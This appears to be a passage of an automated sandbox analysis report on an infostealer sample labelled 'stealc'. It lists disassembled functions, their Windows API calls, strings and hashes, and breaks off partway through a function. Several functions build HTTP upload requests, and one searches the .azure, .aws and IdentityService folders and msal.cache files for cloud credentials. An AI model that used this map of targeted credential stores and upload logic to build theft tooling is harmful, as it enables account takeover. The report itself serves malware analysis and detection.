Function 00695100 Relevance: 53.1, APIs: 22, Strings: 8, Instructions: 569
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6

Part of subcall function 006947B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 006947EA
Part of subcall function 006947B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00694801
Part of subcall function 006947B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00694818
Part of subcall function 006947B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00694839
Part of subcall function 006947B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00694849

lstrlenA.KERNEL32(00000000), ref: 00695193

Part of subcall function 006A8EA0: CryptBinaryToStringA.CRYPT32(00000000,00695184,40000001,00000000,00000000,?,00695184), ref: 006A8EC0

Part of subcall function 006AA740: lstrcpy.KERNEL32(k,00000000), ref: 006AA788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00695207
StrCmpCA.SHLWAPI(?,00A0D880), ref: 00695225
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00695340
HttpOpenRequestA.WININET(00000000,00A0D8A0,?,00A11BC8,00000000,00000000,00400100,00000000), ref: 006953A4

Part of subcall function 006AA9B0: lstrlenA.KERNEL32(?,006B1110,?,00000000,006B0AEF), ref: 006AA9C5
Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
Part of subcall function 006AA9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 006AAA12

Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,k), ref: 006AA905

Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
Part of subcall function 006AA920: lstrcatA.KERNEL32(00000000), ref: 006AA982

lstrlenA.KERNEL32(00000000,00000000,?,",00000000,?,00A11E88,00000000,?,00A04730,00000000,?,006B19DC,00000000,?,006A51CF), ref: 00695737
lstrlenA.KERNEL32(00000000), ref: 0069574B
GetProcessHeap.KERNEL32(00000000,?), ref: 0069575C
HeapAlloc.KERNEL32(00000000), ref: 00695763
lstrlenA.KERNEL32(00000000), ref: 00695778
memcpy.MSVCRT(?,00000000,00000000), ref: 0069578F
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 006957A9
memcpy.MSVCRT(?), ref: 006957B6
lstrlenA.KERNEL32(00000000), ref: 006957C8
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 006957E1
memcpy.MSVCRT(?), ref: 006957F1
lstrlenA.KERNEL32(00000000,?,?), ref: 0069580E
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00695822
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0069584D
InternetCloseHandle.WININET(00000000), ref: 006958B1
InternetCloseHandle.WININET(00000000), ref: 006958BE
InternetCloseHandle.WININET(00000000), ref: 006958C8

Strings

", xrefs: 00695706
", xrefs: 006955C4
------, xrefs: 0069563B
------, xrefs: 006954F9
------, xrefs: 00695297
------, xrefs: 006953B7
--, xrefs: 00695280
", xrefs: 00695482

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$??2@CloseHandlememcpy$HeapHttpOpenRequestlstrcat$AllocBinaryConnectCrackCryptFileProcessReadSendString
String ID: ------$"$"$"$--$------$------$------
API String ID: 2744873387-2774362122
Opcode ID: 85328757cace139f260b68e13fd5957ee3d9c24e91841c2946a59fc52faff66e
Instruction ID: 427be2a0b62366c1c72a1a955c3e99e9e9cebc8a4680484dd14e9ca20c1fb7c7
Opcode Fuzzy Hash: 85328757cace139f260b68e13fd5957ee3d9c24e91841c2946a59fc52faff66e
Instruction Fuzzy Hash: 4E322F71921118AADB94FBE0DC91FEEB37ABF15700F50419EB10662092EF346E49CF69

Function 00695960 Relevance: 42.5, APIs: 19, Strings: 5, Instructions: 493
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6

Part of subcall function 006947B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 006947EA
Part of subcall function 006947B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00694801
Part of subcall function 006947B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00694818
Part of subcall function 006947B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00694839
Part of subcall function 006947B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00694849

Part of subcall function 006AA740: lstrcpy.KERNEL32(k,00000000), ref: 006AA788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 006959F8
StrCmpCA.SHLWAPI(?,00A0D880), ref: 00695A13
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00695B93
lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00A11D48,00000000,?,00A04730,00000000,?,006B1A1C), ref: 00695E71
lstrlenA.KERNEL32(00000000), ref: 00695E82
GetProcessHeap.KERNEL32(00000000,?), ref: 00695E93
HeapAlloc.KERNEL32(00000000), ref: 00695E9A
lstrlenA.KERNEL32(00000000), ref: 00695EAF
memcpy.MSVCRT(?,00000000,00000000), ref: 00695EC6
lstrlenA.KERNEL32(00000000), ref: 00695ED8
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00695EF1
memcpy.MSVCRT(?), ref: 00695EFE
lstrlenA.KERNEL32(00000000,?,?), ref: 00695F1B
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00695F2F
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00695F4C
InternetCloseHandle.WININET(00000000), ref: 00695FB0
InternetCloseHandle.WININET(00000000), ref: 00695FBD
HttpOpenRequestA.WININET(00000000,00A0D8A0,?,00A11BC8,00000000,00000000,00400100,00000000), ref: 00695BF8

Part of subcall function 006AA9B0: lstrlenA.KERNEL32(?,006B1110,?,00000000,006B0AEF), ref: 006AA9C5
Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
Part of subcall function 006AA9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 006AAA12

Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,k), ref: 006AA905

Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
Part of subcall function 006AA920: lstrcatA.KERNEL32(00000000), ref: 006AA982

InternetCloseHandle.WININET(00000000), ref: 00695FC7

Strings

------, xrefs: 00695A96
", xrefs: 00695CD5
", xrefs: 00695E16
------, xrefs: 00695C0B
------, xrefs: 00695D4C

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
String ID: "$"$------$------$------
API String ID: 1406981993-2180234286
Opcode ID: cf0cefbd9375da8667fd3cc1387c44658d53a33f638086748f748d8e477ebed5
Instruction ID: 48d9ac7e35228987b3c448a9743efb3fec2bdbe0175d45d26743533ff8da6134
Opcode Fuzzy Hash: cf0cefbd9375da8667fd3cc1387c44658d53a33f638086748f748d8e477ebed5
Instruction Fuzzy Hash: D7121C71821118AADB95FBE0DC95FEEB37ABF15700F50419EB10662091EF342E49CF69

Function 0069A790 Relevance: 40.8, APIs: 22, Strings: 1, Instructions: 538
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006AAA70: StrCmpCA.SHLWAPI(00000000,006B1470,0069D1A2,006B1470,00000000), ref: 006AAA8F

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0069AAC8
RtlAllocateHeap.NTDLL(00000000), ref: 0069AACF
StrCmpCA.SHLWAPI(00000000,ERROR_RUN_EXTRACTOR), ref: 0069ABE2
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0069A8B0

Part of subcall function 006AA820: lstrlenA.KERNEL32(00000000,?,?,006A5B54,006B0ADB,006B0ADA,?,?,006A6B16,00000000,?,00A01348,?,006B110C,?,00000000), ref: 006AA82B
Part of subcall function 006AA820: lstrcpy.KERNEL32(k,00000000), ref: 006AA885

Part of subcall function 006AA9B0: lstrlenA.KERNEL32(?,006B1110,?,00000000,006B0AEF), ref: 006AA9C5
Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
Part of subcall function 006AA9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 006AAA12

Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,k), ref: 006AA905

lstrcatA.KERNEL32(?,00000000,00000000,00A0D650,006B1318,00A0D650,006B1314), ref: 0069ACEB
lstrcatA.KERNEL32(?,006B1320), ref: 0069ACFA
lstrcatA.KERNEL32(?,00000000), ref: 0069AD0D
lstrcatA.KERNEL32(?,006B1324), ref: 0069AD1C
lstrcatA.KERNEL32(?,00000000), ref: 0069AD2F
lstrcatA.KERNEL32(?,006B1328), ref: 0069AD3E
lstrcatA.KERNEL32(?,00000000), ref: 0069AD51
lstrcatA.KERNEL32(?,006B132C), ref: 0069AD60
lstrcatA.KERNEL32(?,00000000), ref: 0069AD73
lstrcatA.KERNEL32(?,006B1330), ref: 0069AD82
lstrcatA.KERNEL32(?,00000000), ref: 0069AD95
lstrcatA.KERNEL32(?,006B1334), ref: 0069ADA4
lstrcatA.KERNEL32(?,00000000), ref: 0069ADB7
lstrlenA.KERNEL32(?), ref: 0069AE0D
lstrlenA.KERNEL32(?), ref: 0069AE1C
memset.MSVCRT ref: 0069AE6B

Part of subcall function 006AA740: lstrcpy.KERNEL32(k,00000000), ref: 006AA788

Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6

Part of subcall function 00699E10: memcmp.MSVCRT(?,v20,00000003), ref: 00699E2D

DeleteFileA.KERNEL32(00000000), ref: 0069AE97

Strings

ERROR_RUN_EXTRACTOR, xrefs: 0069ABD4

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessmemcmpmemset
String ID: ERROR_RUN_EXTRACTOR
API String ID: 4068497927-2709115261
Opcode ID: 1d5ac22867e18c84b034751974ffa32fc1a9be2be545969a42e2e333d36c681e
Instruction ID: 29ab158f519664f6d809dcffebe7168a36bd261f9aeebbfbf0798064b9557e46
Opcode Fuzzy Hash: 1d5ac22867e18c84b034751974ffa32fc1a9be2be545969a42e2e333d36c681e
Instruction Fuzzy Hash: B612FD719111049BCB88FBE0DD96EEE737ABF15300F50415AB507A6091EF34AE49CFA6

Function 006A4D70 Relevance: 35.1, APIs: 10, Strings: 10, Instructions: 119
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 006A4D87

Part of subcall function 006A8DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 006A8E0B

lstrcatA.KERNEL32(?,00000000), ref: 006A4DB0
lstrcatA.KERNEL32(?,\.azure\), ref: 006A4DCD

Part of subcall function 006A4910: wsprintfA.USER32 ref: 006A492C
Part of subcall function 006A4910: FindFirstFileA.KERNEL32(?,?), ref: 006A4943

memset.MSVCRT ref: 006A4E13
lstrcatA.KERNEL32(?,00000000), ref: 006A4E3C
lstrcatA.KERNEL32(?,\.aws\), ref: 006A4E59

Part of subcall function 006A4910: StrCmpCA.SHLWAPI(?,006B0FDC), ref: 006A4971
Part of subcall function 006A4910: StrCmpCA.SHLWAPI(?,006B0FE0), ref: 006A4987
Part of subcall function 006A4910: FindNextFileA.KERNEL32(000000FF,?), ref: 006A4B7D
Part of subcall function 006A4910: FindClose.KERNEL32(000000FF), ref: 006A4B92

memset.MSVCRT ref: 006A4E9F
lstrcatA.KERNEL32(?,00000000), ref: 006A4EC8
lstrcatA.KERNEL32(?,\.IdentityService\), ref: 006A4EE5

Part of subcall function 006A4910: wsprintfA.USER32 ref: 006A49B0
Part of subcall function 006A4910: StrCmpCA.SHLWAPI(?,006B08D2), ref: 006A49C5
Part of subcall function 006A4910: wsprintfA.USER32 ref: 006A49E2
Part of subcall function 006A4910: PathMatchSpecA.SHLWAPI(?,?), ref: 006A4A1E
Part of subcall function 006A4910: lstrcatA.KERNEL32(?,00A0D870,?,000003E8), ref: 006A4A4A
Part of subcall function 006A4910: lstrcatA.KERNEL32(?,006B0FF8), ref: 006A4A5C
Part of subcall function 006A4910: lstrcatA.KERNEL32(?,?), ref: 006A4A70
Part of subcall function 006A4910: lstrcatA.KERNEL32(?,006B0FFC), ref: 006A4A82
Part of subcall function 006A4910: lstrcatA.KERNEL32(?,?), ref: 006A4A96
Part of subcall function 006A4910: CopyFileA.KERNEL32(?,?,00000001), ref: 006A4AAC
Part of subcall function 006A4910: DeleteFileA.KERNEL32(?), ref: 006A4B31

memset.MSVCRT ref: 006A4F2B

Strings

*.*, xrefs: 006A4E64
Azure\.azure, xrefs: 006A4DD3
zaj, xrefs: 006A4DF1, 006A4E7D, 006A4F09, 006A4F34, 006A4DF4, 006A4E80, 006A4F0C
Azure\.aws, xrefs: 006A4E5F
\.azure\, xrefs: 006A4DC1
msal.cache, xrefs: 006A4EF0
*.*, xrefs: 006A4DD8
\.aws\, xrefs: 006A4E4D
Azure\.IdentityService, xrefs: 006A4EEB
\.IdentityService\, xrefs: 006A4ED9

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache$zaj
API String ID: 4017274736-2783307788
Opcode ID: bf1bd1197a61abbb4e1c977dc9d28cfaefb7e9977ede3103eba0c3fac3dd0db2
Instruction ID: 89e002e722f93dc11829e6af19a3d2b44847aff7fa4bc89b5ec008ab391014cb
Opcode Fuzzy Hash: bf1bd1197a61abbb4e1c977dc9d28cfaefb7e9977ede3103eba0c3fac3dd0db2
Instruction Fuzzy Hash: 1A41E5B594020867CB94F770DC57FDD373AAB15700F404458B646A60C1EEB49BD8CF96

Function 0069CEF0 Relevance: 31.9, APIs: 21, Instructions: 374
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006AA740: lstrcpy.KERNEL32(k,00000000), ref: 006AA788

Part of subcall function 006AA9B0: lstrlenA.KERNEL32(?,006B1110,?,00000000,006B0AEF), ref: 006AA9C5
Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
Part of subcall function 006AA9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 006AAA12

Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,k), ref: 006AA905

Part of subcall function 006A8B60: GetSystemTime.KERNEL32(?,00A04790,006B05AE,?,?,?,?,?,?,?,?,?,00694963,?,00000014), ref: 006A8B86

Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
Part of subcall function 006AA920: lstrcatA.KERNEL32(00000000), ref: 006AA982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0069CF83
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0069D0C7
RtlAllocateHeap.NTDLL(00000000), ref: 0069D0CE
lstrcatA.KERNEL32(?,00000000,00A0D650,006B1474,00A0D650,006B1470,00000000), ref: 0069D208
lstrcatA.KERNEL32(?,006B1478), ref: 0069D217
lstrcatA.KERNEL32(?,00000000), ref: 0069D22A
lstrcatA.KERNEL32(?,006B147C), ref: 0069D239
lstrcatA.KERNEL32(?,00000000), ref: 0069D24C
lstrcatA.KERNEL32(?,006B1480), ref: 0069D25B
lstrcatA.KERNEL32(?,00000000), ref: 0069D26E
lstrcatA.KERNEL32(?,006B1484), ref: 0069D27D
lstrcatA.KERNEL32(?,00000000), ref: 0069D290
lstrcatA.KERNEL32(?,006B1488), ref: 0069D29F
lstrcatA.KERNEL32(?,00000000), ref: 0069D2B2
lstrcatA.KERNEL32(?,006B148C), ref: 0069D2C1
lstrcatA.KERNEL32(?,00000000), ref: 0069D2D4
lstrcatA.KERNEL32(?,006B1490), ref: 0069D2E3

Part of subcall function 006AA820: lstrlenA.KERNEL32(00000000,?,?,006A5B54,006B0ADB,006B0ADA,?,?,006A6B16,00000000,?,00A01348,?,006B110C,?,00000000), ref: 006AA82B
Part of subcall function 006AA820: lstrcpy.KERNEL32(k,00000000), ref: 006AA885

lstrlenA.KERNEL32(?), ref: 0069D32A
lstrlenA.KERNEL32(?), ref: 0069D339
memset.MSVCRT ref: 0069D388

Part of subcall function 006AAA70: StrCmpCA.SHLWAPI(00000000,006B1470,0069D1A2,006B1470,00000000), ref: 006AAA8F

DeleteFileA.KERNEL32(00000000), ref: 0069D3B4

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
String ID:
API String ID: 1973479514-0
Opcode ID: a26ab57070671c3dbb4d278799433695d5d8c82fdef3132232483b8277a8c6bf
Instruction ID: a3f8201ca6a06cf0b298169eca2d36df849cc40ee7fcd0e3ae221ada76df6469
Opcode Fuzzy Hash: a26ab57070671c3dbb4d278799433695d5d8c82fdef3132232483b8277a8c6bf
Instruction Fuzzy Hash: 68E1F771911108ABCB88FBE0DD96EEE737ABF15301F10416AB507A6091DF35AE09CF66

Function 00694880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON

Download Yara Rule

APIs

Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6

Part of subcall function 006947B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 006947EA
Part of subcall function 006947B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00694801
Part of subcall function 006947B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00694818
Part of subcall function 006947B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00694839
